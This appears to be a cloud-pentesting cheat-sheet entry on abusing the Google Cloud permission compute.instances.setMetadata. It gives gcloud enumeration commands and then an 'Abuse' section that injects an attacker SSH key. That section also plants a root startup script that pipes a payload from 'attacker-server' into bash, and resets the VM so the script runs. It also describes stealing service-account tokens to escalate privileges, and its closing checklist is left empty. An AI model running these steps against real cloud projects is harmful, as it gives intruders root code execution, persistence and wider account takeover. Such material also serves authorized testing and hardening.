compute.instances.setMetadata

The compute.instances.setMetadata permission allows a principal to modify the metadata of a Google Compute Engine VM instance. While metadata is intended for configuration purposes (such as SSH keys, startup scripts, and custom parameters), this permission can effectively lead to remote code execution if abused. An attacker with this permission can inject malicious startup scripts that execute as root on reboot or add SSH keys (if OS Login is not enforced) to gain shell access. If the targeted VM runs with a privileged service account, the attacker can then extract access tokens from the metadata server and escalate privileges across the project.

Enum

gcloud compute instances list
gcloud compute instances list --zones=ZONE
gcloud compute instances describe INSTANCE_NAME --zone=ZONE
gcloud compute instances describe INSTANCE_NAME \
--zone=ZONE --format="value(serviceAccounts.email)"

Abuse

##View metadata
gcloud compute instances describe INSTANCE_NAME \
--zone=ZONE --format="value(metadata.items)"

##Add ssh-keys
ssh-keygen -t rsa -b 4096 -f almighty-vinay -N ""
export PUBKEY="almighty-vinay:$(cat almighty-vinay.pub)"
gcloud compute instances add-metadata INSTANCE_NAME \
  --zone=ZONE \
  --metadata=ssh-keys="$PUBKEY"
  
##Inject startup script
gcloud compute instances add-metadata INSTANCE_NAME \
  --zone=ZONE \
  --metadata=startup-script='#!/bin/bash
curl http://attacker-server/payload.sh | bash'
##reboot VM
gcloud compute instances reset INSTANCE_NAME --zone=ZONE

If OS Login is enforced:

  • SSH key injection via metadata may not work.

Check metadata:

Look for:

Last updated